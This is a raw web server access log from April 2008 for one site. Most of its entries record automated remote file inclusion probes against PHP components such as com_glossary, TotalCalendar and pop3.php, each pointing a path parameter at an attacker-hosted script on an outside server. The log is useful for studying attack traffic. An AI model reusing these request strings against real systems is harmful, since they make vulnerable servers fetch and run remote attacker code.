69.61.30.100 - - [08/Apr/2008:14:31:48 -0700] "GET /logs/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:32:19 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:32:20 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:32:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:32:22 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:32:49 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:32:51 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:32:52 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:32:52 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:32:56 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:33:39 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:33:45 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:33:52 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.22.91 - - [08/Apr/2008:14:33:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:33:52 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.24.96 - - [08/Apr/2008:14:33:52 -0700] "GET /bikes/dteel/2008_01_27/?M=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:33:53 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:33:58 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:34:04 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:34:04 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:34:11 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:34:12 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:34:12 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.98.178 - - [08/Apr/2008:14:34:26 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.227.98.178 - - [08/Apr/2008:14:34:26 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:34:28 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.35 - - [08/Apr/2008:14:34:34 -0700] "GET /bikes/CreSTOC07/?S=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:34:52 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:34:57 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:34:58 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:35:09 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:35:09 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:35:09 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:35:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:35:22 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:35:46 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.172 - - [08/Apr/2008:14:36:03 -0700] "GET /bikes/dteel/2008_01_27/?M=D HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:36:15 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:36:28 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:14:36:38 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:36:45 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:36:46 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:36:46 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:36:47 -0700] "GET /_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:36:49 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:36:49 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:36:50 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.166 - - [08/Apr/2008:14:36:50 -0700] "GET /bikes/dteel/2008_01_27/?N=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:37:05 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:37:06 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:37:06 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:37:06 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:37:07 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:37:35 -0700] "GET /logs/access_071229.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:37:36 -0700] "GET /logs/access.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:37:37 -0700] "GET /index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:37:38 -0700] "GET /logs/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:37:39 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:37:42 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:37:43 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:37:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:37:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:37:54 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:37:54 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:14:37:54 -0700] "GET /logs/access.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:37:56 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:37:56 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:38:06 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:14:38:08 -0700] "GET /logs/access.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:38:08 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:38:08 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:38:09 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:38:10 -0700] "GET /logs/access_080219.log/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:38:10 -0700] "GET /_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:38:11 -0700] "GET /logs/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:38:25 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:38:27 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:38:28 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:14:38:58 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:39:05 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:39:35 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:39:35 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:39:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:36 -0700] "GET /logs/access_080329.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:36 -0700] "GET /lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:36 -0700] "GET /logs/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:39:42 -0700] "GET /logs/access_071229.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:39:43 -0700] "GET /index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:39:44 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:44 -0700] "GET /logs/access_080329.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:44 -0700] "GET /lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:39:44 -0700] "GET /logs/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:39:44 -0700] "GET /logs/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:39:46 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
